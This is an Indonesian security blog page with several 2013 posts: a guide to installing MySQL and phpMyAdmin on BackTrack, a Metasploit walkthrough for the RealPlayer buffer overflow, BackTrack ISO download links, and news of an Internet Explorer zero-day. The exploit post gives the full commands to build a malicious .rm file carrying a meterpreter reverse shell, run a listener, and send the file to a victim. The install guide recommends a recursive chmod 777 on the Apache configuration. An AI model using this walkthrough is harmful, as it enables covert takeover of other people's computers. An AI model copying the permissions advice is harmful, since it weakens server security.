Open Source

Untuk seluruh software yang bersifat Open Source tidak akan tenggelam oleh waktu dikarenakan banyak yang mendukung program tersebut dan software tersebut tidak kalah bersaing dengan software berbayar lainnya.

Certified

Mengambil sertifikasi semata-mata bukan untuk menjadi tenar atau sombong, tapi untuk mengetahui apakah anda mampu mengemban tanggung jawab secara moral terhadap apa yang anda telah pelajari dan bagaimana memberikan ilmu tersebut kepada orang lain tanpa pamrih.

Operating System Pentest

Sistem operasi Bactrack, Kali Linux, dll memang sangat memanjakan para Pentester dalam melaksanakan tugasnya sesuai dengan prosedur yang berlaku. Di OS tersebut disediakan beberapa tools menarik seperti untuk memperoleh information gathering, vulnerability assesment, exploit, dll.

Sherlock Holmes

Film detektif yang satu ini pasti disukai oleh beberapa rekan IT dikarenakan proses jalan ceritanya ketika memecahkan sebuah kasus tidak monoton dan memerlukan logika berpikir yang diluar kebiasaan. Daya hayal harus tinggi ketika ingin menonton film ini.

Forensic

Kegiatan forensic bidang IT sangat membutuhkan tingkat pemahaman yang tinggi akan suatu kasus yang ditangani. Tim yang menangani forensic harus bisa membaca jalan pikiran si Attacker seperti apa jika melakukan serangan. Biasanya Attacker lebih maju selangkah dibanding dengan tim pemburunya.

Rabu, 16 Januari 2013

Cara Mengaktifkan PhpMyadmin dan MySQL Di Bactrack

Selamat pagi dunia maya !!! Apa kabarnya semua, semoga semuanya sehat selalu dan happy.

Di posting kali ini saya ingin membahas bagaimana cara mengaktifkan MySQL dan Phpmyadmin pada Backtrack. Trik ini saya gunakan pada OS Backtrack 5 R3.

Buka console dan ketikkan perintah seperti dibawah ini :

--BIND
apt-get install bind9 bind9-doc

--Apache2

apt-get install apache2 apache2-mpm-prefork apache2-utils apache2.2-common libapache2-mod-php5 libapr1 libaprutil1 libdbd-mysql-perl libdbi-perl libnet-daemon-perl libplrpc-perl libpq5 libapache2-mod-auth-mysql

--MYSQL

apt-get install mysql-client mysql-common mysql-server

--PHP

apt-get install php5 php5-common php5-mysql php5-imap php-pear php5-xmlrpc php5-gd php5-cli

#PHPMyAdmin

apt-get install phpmyadmin

#VsFTPd

apt-get install vsftpd

#postfix

apt-get install postfix postfix-doc postfix-mysql postfix-tls libsasl2-2 libsasl2-modules libsasl2-modules-sql openssl

#courier

apt-get install courier-authdaemon courier-authlib-mysql courier-imap courier-imap-ssl courier-pop courier-pop-ssl

Kemudian jika sudah didownload perintah diatas atau bisa melalui "synaptic package manager" dan search perintah untuk software MySQL, Phpmyadmin, dst. Kemudian centang2 dan apply deh, tapi pastikan koneksi internet anda lancar yah. Jangan lupa di restart yah klo sudah done.

Selanjutnya jika ingin test apakah mysql kita bisa konek atau tidak, maka ikuti perintah dibawah ini :

#Cara mengaktifkan servicenya :
/etc/init.d/mysql start

#Kemudian atur konfigurasi :
mysql_secure_installation

#Jika sudah selesai mengatur perintah kedua, maka jalankan mysql tersebut :
mysql -u root -p

Jika sudah sukses perintah2 diatas, maka kita coba aktifkan PhpMyadmin dengan cara sebagai berikut :

#Aktifkan permission folder :
chmod 777 -R /etc/apache2/

Cek apakah berhasil merubah chmod tersebut dengan mengetikkan :
nano /etc/apache2/apache2.conf

Kemudian tambahkan perintah :
include /etc/phpmyadmin/apache.conf

Tekan CTRL X dan simpan plus overwrite file tersebut. Selanjutnya restart service apache dengan cara :

/etc/init.d/apache2 restart

Terakhir adalah dengan membuka browser kesayangan anda pada OS Backtrack (klo saya buka mozilla). Kemudian ketikkan url 

http://localhost/phpmyadmin


Apakah sudah bisa dibuka teman2 phpmyadmin anda ??? Selamat bagi yang sukses yah. Semoga tutorial singkat diatas dapat berguna bagi para pembaca blog ini.


Thanks

Sabtu, 05 Januari 2013

Hack Remote Windows PC using Real player RealMedia File Handling Buffer Overflow

This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14. The vulnerability exists in the handling of real media files, due to the insecure usage of the Get Private Profile String function to retrieve the URL property from an Internet Shortcut section. This module generates a malicious rm file which must be opened with RealPlayer via drag and drop or double click methods. It has been tested successfully on Windows XP SP3 with RealPlayer 15.0.5.109.

Exploit Targets

Real Player 15.0.5.109

Requirement

Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole

+1 Hack Remote Windows PC using Real player RealMedia File Handling Buffer Overflow
Now type use exploit/windows/fileformat/real_player_url_property_bof
msf exploit (real_player_url_property_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (real_player_url_property_bof)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (real_player_url_property_bof)>exploit
2 Hack Remote Windows PC using Real player RealMedia File Handling Buffer Overflow
After we successfully generate the malicious rm File, it will stored on your local computer
/root/.msf4/local/msf.rm
3 Hack Remote Windows PC using Real player RealMedia File Handling Buffer Overflow
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit
Now send your msf.rm files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
5 Hack Remote Windows PC using Real player RealMedia File Handling Buffer Overflow
4 Hack Remote Windows PC using Real player RealMedia File Handling Buffer Overflow 

Sumber : http://www.hackingarticles.in/hack-remote-windows-pc-using-real-player-realmedia-file-handling-buffer-overflow/

Backtrack 5 (Lokal)

Bagi teman2 yang ingin mendownload iso Backtrack 5 R1 atau R3 dengan koneksi link lokal, ini saya kasih link dari kambing ui dan silahkan disedot gan :

R3 32Bit : http://kambing.ui.ac.id/iso/backtrack/BT5R3-GNOME-32.iso
Versi 64bit : http://kambing.ui.ac.id/iso/backtrack/BT5-GNOME-64.iso

Backtrack 4 : http://kambing.ui.ac.id/iso/backtrack/bt4-r2.iso

Internet Explorer 6, 7 and 8 Vulnerable

Last Friday, we reported that the website of the U.S. Council of Foreign Relations was allegedly compromised by Chinese hackers who exploited the zero-day bug that was only discovered that same day. The CFR website was compromised with JavaScript that served malicious code to older IE browsers and the code then created a heap-spray attack using Adobe Flash Player.
Yesterday former hacker Bryce Case Jr (YTCracker) tweeted about a new zero day exploit threatening all users of IE8, "internet explorer 6-8 0day making the rounds force them toolbar installs and keyloggers on exgf while you still can...".
 
On Saturday, Microsoft published a security advisory warning users of Internet Explorer 6, 7, and 8 that they could be vulnerable to remote code execution hacks. The vulnerability is a remote code execution vulnerability that exists in the way that Internet Explorer accesses an object in memory that has been deleted or has not been properly allocated.
The vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer. An attacker could host a specially crafted website that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the website.
Meanwhile, the software giant will be shipping a software fix, available from its Fix It Solution Center, to protect systems before the patch is ready. Microsoft also has posted several mitigation options for users of Internet Explorer 8 or earlier to protect the Windows operating system from the exploit.
The best measure - of course,  switch to Google Chrome and Mozilla Firefox.
 
Sumbernya : thehackernews.com/2012/12/internet-explorer-6-7-and-8-vulnerable.html